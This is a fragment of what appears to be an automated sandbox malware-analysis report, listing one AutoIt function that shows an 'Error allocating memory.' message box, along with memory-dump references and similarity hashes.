                                                                                                                                    Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                      • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message_doexit
                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                                    • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                    • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                    • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                    • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E